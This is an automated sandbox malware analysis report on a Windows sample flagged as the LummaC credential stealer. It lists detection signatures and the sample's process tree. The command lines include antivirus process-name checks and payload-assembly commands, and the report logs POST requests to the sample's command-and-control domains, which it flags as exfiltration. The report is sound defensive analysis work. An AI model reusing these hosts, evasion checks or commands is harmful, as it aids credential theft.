Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FloydMounts.exe

Overview

General Information

Sample name:FloydMounts.exe
Analysis ID:1581279
MD5:a3e3a09c63c5270ac7e96a7b25034335
SHA1:2df0d057d0a1674afce368e491113adff5c90570
SHA256:b8e176aa49edb6f9bedb2e3f3e36fbfe046af1d7550f58938cd4b04c94b92f84
Tags:exeuser-zhuzhu0009
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • FloydMounts.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\FloydMounts.exe" MD5: A3E3A09C63C5270AC7E96A7B25034335)
    • cmd.exe (PID: 3444 cmdline: "C:\Windows\System32\cmd.exe" /c move Blvd Blvd.cmd & Blvd.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6208 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3688 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3300 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6984 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2916 cmdline: cmd /c md 174436 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 5752 cmdline: extrac32 /Y /E Contribute MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 6036 cmdline: findstr /V "nightlife" Consultants MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6208 cmdline: cmd /c copy /b ..\Share + ..\Crimes + ..\Briefing + ..\Rj + ..\Pierre + ..\Loving U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Produces.com (PID: 6636 cmdline: Produces.com U MD5: 62D09F076E6E0240548C2F837536A46A)
        • X4PCDQPDT1B8IDPB7SN83.exe (PID: 5696 cmdline: "C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" MD5: 1DBAC9190F7C834BBB99CE9010475856)
          • X4PCDQPDT1B8IDPB7SN83.tmp (PID: 6472 cmdline: "C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp" /SL5="$5044E,10753133,845824,C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" MD5: A62041070E18901131CBBE7825EC4EC7)
            • X4PCDQPDT1B8IDPB7SN83.exe (PID: 6804 cmdline: "C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" /VERYSILENT MD5: 1DBAC9190F7C834BBB99CE9010475856)
              • X4PCDQPDT1B8IDPB7SN83.tmp (PID: 6876 cmdline: "C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp" /SL5="$6044E,10753133,845824,C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" /VERYSILENT MD5: A62041070E18901131CBBE7825EC4EC7)
                • timeout.exe (PID: 4916 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
                  • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 3568 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 4936 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3176 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 2356 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 2996 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3120 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 4080 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 396 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 2692 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 2648 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 1664 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 4048 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 2664 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 888 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3696 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 4416 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 1004 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3484 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • ulu_mon.exe (PID: 5628 cmdline: "C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe" MD5: 6148379F983034E295E4A943A5F1198F)
      • choice.exe (PID: 7072 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          Process Memory Space: ulu_mon.exe PID: 5628JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            47.0.ulu_mon.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

              Sigma Signatures

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sigma detected: Search for Antivirus process
              Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Blvd Blvd.cmd & Blvd.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3444, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6984, ProcessName: findstr.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T10:11:42.275845+010020283713Unknown Traffic192.168.2.449739104.21.25.41443TCP
              2024-12-27T10:11:44.276873+010020283713Unknown Traffic192.168.2.449740104.21.25.41443TCP
              2024-12-27T10:11:46.617451+010020283713Unknown Traffic192.168.2.449741104.21.25.41443TCP
              2024-12-27T10:11:48.917491+010020283713Unknown Traffic192.168.2.449742104.21.25.41443TCP
              2024-12-27T10:11:54.288916+010020283713Unknown Traffic192.168.2.449743104.21.25.41443TCP
              2024-12-27T10:11:56.635597+010020283713Unknown Traffic192.168.2.449745104.21.25.41443TCP
              2024-12-27T10:11:58.997923+010020283713Unknown Traffic192.168.2.449747104.21.25.41443TCP
              2024-12-27T10:12:02.812757+010020283713Unknown Traffic192.168.2.449758104.21.25.41443TCP
              2024-12-27T10:12:05.154549+010020283713Unknown Traffic192.168.2.449763104.21.74.235443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T10:11:43.009436+010020546531A Network Trojan was detected192.168.2.449739104.21.25.41443TCP
              2024-12-27T10:11:45.075017+010020546531A Network Trojan was detected192.168.2.449740104.21.25.41443TCP
              2024-12-27T10:12:03.582821+010020546531A Network Trojan was detected192.168.2.449758104.21.25.41443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T10:11:43.009436+010020498361A Network Trojan was detected192.168.2.449739104.21.25.41443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T10:11:45.075017+010020498121A Network Trojan was detected192.168.2.449740104.21.25.41443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T10:12:06.438791+010020084381A Network Trojan was detected104.21.74.235443192.168.2.449763TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T10:11:52.958511+010020480941Malware Command and Control Activity Detected192.168.2.449742104.21.25.41443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T10:11:59.072441+010028438641A Network Trojan was detected192.168.2.449747104.21.25.41443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: FloydMounts.exeVirustotal: Detection: 25%Perma Link
              Source: FloydMounts.exeReversingLabs: Detection: 18%
              Source: FloydMounts.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.25.41:443 -> 192.168.2.4:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.74.235:443 -> 192.168.2.4:49763 version: TLS 1.2
              Source: FloydMounts.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: wntdll.pdbUGP source: ulu_mon.exe, 0000002F.00000002.3157412427.0000000004283000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000002.3159720691.00000000045E0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: ulu_mon.exe, 0000002F.00000002.3157412427.0000000004283000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000002.3159720691.00000000045E0000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\174436\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\174436Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49740 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49758 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49747 -> 104.21.25.41:443
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49763 -> 104.21.74.235:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.25.41:443
              Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.74.235:443 -> 192.168.2.4:49763
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wetlivelky.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: wetlivelky.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3GRJ7LHDSCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18115Host: wetlivelky.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VQCPK4875User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8730Host: wetlivelky.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CKT12CXR99MRREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20413Host: wetlivelky.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KOZIYHDO9U8A1TEZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1234Host: wetlivelky.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J5KIXPMO1MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 591733Host: wetlivelky.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: wetlivelky.click
              Source: global trafficHTTP traffic detected: GET /int_clp_prof.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipjarifaa.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /int_clp_prof.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipjarifaa.shop
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.facebook.com/mobile/ equals www.facebook.com (Facebook)
              Source: global trafficDNS traffic detected: DNS query: cCOKcDhDNH.cCOKcDhDNH
              Source: global trafficDNS traffic detected: DNS query: wetlivelky.click
              Source: global trafficDNS traffic detected: DNS query: klipjarifaa.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wetlivelky.click
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://antivirus.zipgenius.it
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://antivirus.zipgenius.itopenU
              Source: is-PGV92.tmp.20.drString found in binary or memory: http://api.qrtag.net/qrcode/240/
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
              Source: FloydMounts.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
              Source: FloydMounts.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmp, FloydMounts.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertr
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
